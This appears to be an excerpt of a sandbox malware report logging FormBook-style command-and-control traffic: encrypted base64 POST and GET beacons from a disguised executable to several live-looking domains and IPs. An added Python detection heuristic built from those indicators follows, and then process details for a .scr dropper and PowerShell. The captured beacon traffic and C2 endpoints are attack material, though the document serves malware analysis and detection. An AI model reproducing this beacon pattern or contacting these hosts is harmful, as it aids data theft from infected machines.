                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Data Ascii: APatc2S= [TRUNCATED]


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49971 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:41.486989021 CET | Bytes transferred: 420 | Direction: OUT
GET /lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Timestamp: Dec 24, 2024 11:37:43.688059092 CET | Bytes transferred: 139 | Direction: IN
HTTP/1.1 567 unknown
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:43 GMT
                                                                                                                    Content-Length: 17
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: Request too large


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49991 | Destination IP: 104.21.80.1 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:49.262809038 CET | Bytes transferred: 694 | Direction: OUT
POST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Ascii: APatc2S=ZcgPL9y2MWuRzrsdZNd/+CFyxzwxLDFpKLPe5VvoXHd7ydiHENYMeZs/Q/KVms0i5Gd/Mxwh9tNKaKBGD728yJG+Id8BDBYBkidAYzS4BgoEdrCa2IgkWPI0CnZbuCmCxTBUzZGfxVic6I/NCWL1MBvYF9yop6YubjEZuYGDWub5v5qWZ2G8jIi/+s3zuBkJ+A==


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49997 | Destination IP: 104.21.80.1 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:51.932306051 CET | Bytes transferred: 714 | Direction: OUT
POST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Ascii: APatc2S=ZcgPL9y2MWuRyKcdYu1/rSFxtjwxQTFXKLTe5R21W1p7z8SHFPwMfZs/afKUpM0p5GRoMwMh9tZKaPlGCK2/yZG8E98DOhYBkidAY3zXBkEEdbya3qYnIfIrBnZb4CmOxTA7zdn6xXac6K3NCHLyCBuyB9yjnbtqXCx6nbCEYMbWq/nMIHnrxIGMjr+HjCZAlFG39NQk48m8ZavCry+IHtE=


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 50004 | Destination IP: 104.21.80.1 | Destination Port: 80 | PID: 1228 | Process: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp: Dec 24, 2024 11:37:54.601563931 CET | Bytes transferred: 10796 | Direction: OUT
POST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Data Ascii: APatc2S= [TRUNCATED]
Timestamp: Dec 24, 2024 11:37:56.174464941 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:56 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    strict-transport-security: max-age=31536000;
                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                    x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                    location: https://www.dejikenkyu.cyou/pmpa/
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZ%2BNMZsCS1AS8xwcSEa7lJWJCezdZoeGH2U%2FjA3Zf%2Bw7rt%2FKYTAXYYGBSG92ez5ANXnNWUufr%2BEsWER7CqNC%2FyjXx80WYFP%2BobZobCUvOFWQWLoQvrtR21gb2JWSp0TJZ9LR0IrZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6ff575ff1243ee-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=3&recv
                                                                                                                    Data Raw:
                                                                                                                    Data Ascii:
                                                                                                                     Dec 24, 2024 11:37:56.174500942 CET | 129 | IN | Data Raw: 31 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 37 39 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 32 38 26 75 6e 73 65 6e 74 5f
                                                                                                                    Data Ascii: 11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10796&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     28 | 192.168.2.4 | 50012 | 104.21.80.1 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:37:57.250525951 CET | 424 | OUT | GET /pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                     Dec 24, 2024 11:37:59.023072004 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:58 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    location: https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    strict-transport-security: max-age=31536000;
                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                    x-redirect-by: WordPress
                                                                                                                    x-litespeed-cache: miss
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zB9CqNsAo7qvfYardYGtVXo7j9icNt0%2Bdc7gyYDGxHInJ6z%2FFKwqjMmz6kYGg%2F%2FB%2FVhzPCaMedOTxzLjwTHyTG6T7Bx03vzf99syg9jxrDJ2cxi7GzhUSZ%2FwmiPtUkd7BMpsabJ7"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6ff586980d0f36-EWR
                                                                                                                    server-timing: cfL4;desc="?proto=
                                                                                                                    Data Raw:
                                                                                                                    Data Ascii:
                                                                                                                     Dec 24, 2024 11:37:59.023078918 CET | 175 | IN | Data Raw: 43 50 26 72 74 74 3d 31 34 35 39 26 6d 69 6e 5f 72 74 74 3d 31 34 35 39 26 72 74 74 5f 76 61 72 3d 37 32 39 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72
                                                                                                                    Data Ascii: CP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=424&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     29 | 192.168.2.4 | 50030 | 85.159.66.93 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:38:05.256869078 CET | 703 | OUT | POST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 70 38 6b 56 6d 57 58 56 45 2f 6b 48 44 34 36 6a 4a 6a 6a 6f 74 77 59 51 62 6b 39 70 7a 64 6a 65 76 65 63 43 4f 49 4d 7a 31 51 79 63 31 68 37 63 52 31 57 4a 6f 66 37 36 68 45 36 39 54 77 36 41 69 71 37 39 73 51 32 6a 2f 6f 7a 77 78 46 72 50 72 68 39 33 36 61 6c 62 64 68 64 78 2f 54 67 51 44 6a 35 58 54 68 67 5a 77 39 54 4c 5a 73 74 6c 4e 4e 77 56 55 4e 70 5a 48 2f 2b 66 76 65 72 2b 61 32 42 5a 6f 79 69 49 55 73 37 51 76 66 6c 2b 56 68 41 4b 71 4e 32 59 52 43 6e 68 4d 4e 73 72 62 6e 57 30 35 34 69 6b 32 6f 51 76 4d 4d 62 4d 37 54 6d 4b 2b 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78p8kVmWXVE/kHD46jJjjotwYQbk9pzdjevecCOIMz1Qyc1h7cR1WJof76hE69Tw6Aiq79sQ2j/ozwxFrPrh936albdhdx/TgQDj5XThgZw9TLZstlNNwVUNpZH/+fver+a2BZoyiIUs7Qvfl+VhAKqN2YRCnhMNsrbnW054ik2oQvMMbM7TmK+A==


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     30 | 192.168.2.4 | 50036 | 85.159.66.93 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:38:07.912138939 CET | 723 | OUT | POST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 72 66 73 56 31 68 4c 56 4d 2f 6b 45 4d 59 36 6a 51 54 6a 6b 74 77 55 51 62 6d 52 48 7a 72 37 65 76 38 45 43 50 4e 77 7a 30 51 79 63 67 52 36 55 56 31 57 41 6f 66 6e 49 68 46 32 39 54 32 57 41 69 71 4c 39 73 48 61 6b 35 34 7a 79 33 46 72 4a 68 42 39 33 36 61 6c 62 64 69 68 62 2f 54 49 51 44 7a 4a 58 51 41 67 59 75 74 54 49 51 4d 74 6c 4a 4e 77 52 55 4e 70 33 48 37 2b 6c 76 63 6a 2b 61 7a 39 5a 72 6e 57 4c 61 73 37 61 79 50 6b 64 64 44 52 30 6b 73 4c 6d 53 54 2f 47 53 4d 73 61 58 42 62 75 6f 4a 44 7a 6b 6f 30 63 52 4c 53 34 32 51 62 44 6c 41 75 57 35 44 41 71 34 63 63 57 72 36 5a 57 4d 55 67 42 55 37 41 3d
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78rfsV1hLVM/kEMY6jQTjktwUQbmRHzr7ev8ECPNwz0QycgR6UV1WAofnIhF29T2WAiqL9sHak54zy3FrJhB936albdihb/TIQDzJXQAgYutTIQMtlJNwRUNp3H7+lvcj+az9ZrnWLas7ayPkddDR0ksLmST/GSMsaXBbuoJDzko0cRLS42QbDlAuW5DAq4ccWr6ZWMUgBU7A=


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     31 | 192.168.2.4 | 50040 | 85.159.66.93 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:38:10.569849014 CET | 10805 | OUT | POST /uwne/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Origin: http://www.letsbookcruise.xyz
                                                                                                                    Referer: http://www.letsbookcruise.xyz/uwne/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 69 4a 66 61 42 33 42 41 35 72 37 38 72 66 73 56 31 68 4c 56 4d 2f 6b 45 4d 59 36 6a 51 54 6a 6b 74 77 55 51 62 6d 52 48 7a 72 44 65 76 4a 59 43 4f 75 59 7a 7a 51 79 63 68 52 36 58 56 31 58 43 6f 66 76 4d 68 46 4b 74 54 7a 4b 41 6a 4a 7a 39 37 47 61 6b 77 34 7a 79 31 46 72 49 72 68 39 69 36 65 4a 66 64 69 78 62 2f 54 49 51 44 78 52 58 45 68 67 59 73 74 54 4c 5a 73 74 68 4e 4e 78 47 55 4e 78 42 48 37 71 50 75 73 44 2b 62 54 4e 5a 34 6c 4f 4c 46 63 37 63 68 2f 6b 37 64 44 64 52 6b 74 6d 58 53 54 62 38 53 4d 59 61 45 6c 53 36 33 74 44 75 78 37 6f 6e 4e 61 32 31 75 53 37 37 6a 58 79 76 34 57 55 76 72 73 6f 47 77 49 34 79 59 48 4e 4b 42 73 44 6a 68 63 4b 73 4f 42 6c 6e 57 36 69 4d 68 73 46 6c 6a 7a 39 73 49 6f 69 56 71 4f 47 72 53 5a 34 38 4c 67 77 6d 61 2f 32 57 67 52 61 64 4d 32 5a 4f 31 53 42 79 2b 47 71 58 47 30 6b 76 38 42 72 46 72 63 54 77 6e 63 42 51 54 55 78 32 6c 66 35 32 52 6b 5a 6f 39 53 33 49 37 79 6b 4e 77 72 59 5a 62 36 72 56 53 6d 35 74 52 52 58 4d 46 6e 62 70 36 56 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=iJfaB3BA5r78rfsV1hLVM/kEMY6jQTjktwUQbmRHzrDevJYCOuYzzQychR6XV1XCofvMhFKtTzKAjJz97Gakw4zy1FrIrh9i6eJfdixb/TIQDxRXEhgYstTLZsthNNxGUNxBH7qPusD+bTNZ4lOLFc7ch/k7dDdRktmXSTb8SMYaElS63tDux7onNa21uS77jXyv4WUvrsoGwI4yYHNKBsDjhcKsOBlnW6iMhsFljz9sIoiVqOGrSZ48Lgwma/2WgRadM2ZO1SBy+GqXG0kv8BrFrcTwncBQTUx2lf52RkZo9S3I7ykNwrYZb6rVSm5tRRXMFnbp6V5T3FjgXtc+SR5WijKcl7TsbacWEbaGvomTd2IPYf4Q5DS/Zzjow6NZG/2wCvKPvCNRpJcjoFQGRfXnvESNGqsfF6N8Z2uLJvgYCbEoEaQzoGyXwmoWdjQpBI5dmIFeRj0MUvmq1ii9KvJ1dc3PejKWnKdlNMgt6QwbnWvTNAM6tlMNavAS7rChF6CkzmH2x3XqMMrs31ww7UJyk9rrfBdyLNi9SP3BpN6QxCdFLE8QG4EsmP8TZWrxqT9V3pDJn9KmBfrmpBt82DOx59jOM/4aoMbyvgBSQqtB/u7tVm7GFPa5VZxi7a3/rti4bIQnuW8mq+dTuZmC5iIJVVLTVwhz1hCGU/ERmHOgnP8SBspZGA6xM7jm4B4GMnp/yN7ePknbyDpcCzfj8T2TK8rrIhhNkpd7p3zrPfTQvRb/MBhZpYMKU6AKpLoPN4pg+6H4F7BPqbjXNGI5Pfrg4ZIacNo1BzL8oxoOqhaYIk6a87AmmWiSN+i95/Ixr57zBSUgDFa+8E4BoGVLOP+KLt625VPvaAcf0rO/xj+S30RNfmZ81PhwvhxX/LCP7zHCI4BP/bs7clXI7eTf6A1bkn2un1SIbjp/Qj6/3fLMrVdfTf5HnxGrnY1oI2ikRtAhWFNB12k9ytP15ibNxoEB4n+jhMBAQx6oir97xnis [TRUNCATED]


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     32 | 192.168.2.4 | 50041 | 85.159.66.93 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:38:13.224646091 CET | 427 | OUT | GET /uwne/?APatc2S=vL36CH4RwprLmNwp4Gj6N9R+COmNcwDQlAQSHXNI75nLvOBtYNcxpRKkkR/hR1fY7vPFiFbrOB3asJH5t0/H0b+173/mnxpr58pFYDtgi19qUSBoNlsW/NI=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.letsbookcruise.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                     Dec 24, 2024 11:38:14.539556026 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:38:14 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    X-Rate-Limit-Limit: 5s
                                                                                                                    X-Rate-Limit-Remaining: 19
                                                                                                                    X-Rate-Limit-Reset: 2024-12-24T10:38:19.3234688Z
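The sessions above share a recognisable beacon shape: every request carries the same Opera Mini User-Agent, the POSTs to /uwne/ send a single urlencoded field (APatc2S) whose value is a base64 blob, Origin and Referer simply echo the request's own host and path, and the GETs carry the same field plus a short second token (3FNHL). The following Python script is an added example, not part of the Joe Sandbox report, that turns those observations into a triage heuristic and runs it over constructed sample requests. Hosts, paths, header values and field names are copied from the sessions above; the base64 payload is a constructed stand-in, since the real APatc2S values are encrypted C2 data. The threshold and the path pattern are assumptions, tuned to this capture.

```python
"""Heuristic triage of captured HTTP requests for FormBook-style C2 beacons.

Added example; not part of the Joe Sandbox report. Indicators come from the
sessions shown in the report: fixed Opera Mini User-Agent, Origin/Referer that
echo the request's own host and path, a POST whose body is one form field with
a base64 blob, and GETs carrying that field plus a short token. The base64
payload below is a constructed stand-in for the encrypted C2 data.
"""
import base64
import re

# User-Agent string seen on every captured request in the report.
OBSERVED_UA = ("Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) "
               "Presto/2.12.423 Version/12.16")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{6,12}$")
PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")   # one short directory, like /uwne/ (assumption)
THRESHOLD = 3                                 # indicators needed to report a request (assumption)


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def split_form(encoded: str) -> dict:
    """Split key=value pairs without URL-decoding, so '+' and '/' in base64 survive."""
    fields = {}
    for part in filter(None, encoded.split("&")):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def looks_base64(value: str) -> bool:
    """True for a long value in the base64 alphabet that decodes after re-padding."""
    if not B64_RE.match(value):
        return False
    data = value.rstrip("=")
    try:
        base64.b64decode(data + "=" * (-len(data) % 4), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return True


def score_request(raw: str) -> list:
    """Return the FormBook-style indicators matched by one raw request."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "")
    path, _, query = req["target"].partition("?")
    hits = []
    if h.get("user-agent") == OBSERVED_UA:
        hits.append("observed-user-agent")
    origin = h.get("origin", "")
    if host and origin.endswith("://" + host) and h.get("referer") == origin + path:
        hits.append("self-referential-origin-referer")
    if req["method"] == "POST" and h.get("content-type") == "application/x-www-form-urlencoded":
        fields = split_form(req["body"])
        if len(fields) == 1 and looks_base64(next(iter(fields.values()))):
            hits.append("single-base64-form-field")
    if req["method"] == "GET" and query:
        values = list(split_form(query).values())
        if (len(values) == 2 and any(looks_base64(v) for v in values)
                and any(TOKEN_RE.match(v) for v in values)):
            hits.append("base64-plus-token-query")
    if PATH_RE.match(path):
        hits.append("short-directory-path")
    return hits


def triage(requests: list) -> list:
    """Return (index, hits) for every request with at least THRESHOLD indicators."""
    scored = [(i, score_request(raw)) for i, raw in enumerate(requests)]
    return [(i, hits) for i, hits in scored if len(hits) >= THRESHOLD]


# Constructed base64 stand-in for the encrypted APatc2S payload.
FAKE_BLOB = base64.b64encode(b"constructed stand-in for encrypted beacon data").decode()

SAMPLE_REQUESTS = [
    # Shape of the POST /uwne/ beacons in the report (constructed body).
    f"""POST /uwne/ HTTP/1.1
Host: www.letsbookcruise.xyz
Origin: http://www.letsbookcruise.xyz
Referer: http://www.letsbookcruise.xyz/uwne/
Content-Type: application/x-www-form-urlencoded
User-Agent: {OBSERVED_UA}

APatc2S={FAKE_BLOB}""",
    # Shape of the GET /pmpa/?APatc2S=...&3FNHL=... request in the report (constructed value).
    f"""GET /pmpa/?APatc2S={FAKE_BLOB}&3FNHL=wVCtFrFXof HTTP/1.1
Host: www.dejikenkyu.cyou
User-Agent: {OBSERVED_UA}""",
    # Constructed benign request for contrast.
    """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36""",
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_REQUESTS):
        print(f"request {index}: {', '.join(hits)}")
```

Running the script reports the first two constructed requests (four and three indicators) and stays silent on the benign one. The User-Agent match alone is deliberately not enough to flag a request, because a single hardcoded string is trivial for the operator to rotate; the structural indicators (self-referential Origin/Referer, one base64 field, short directory path) survive such a change and are what a production rule should lean on.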



                                                                                                                    Target ID:0
                                                                                                                    Start time:05:35:13
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\SW_48912.scr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0x80000
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5 hash:B4C5A379D38312666805D0D33E2801B7
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
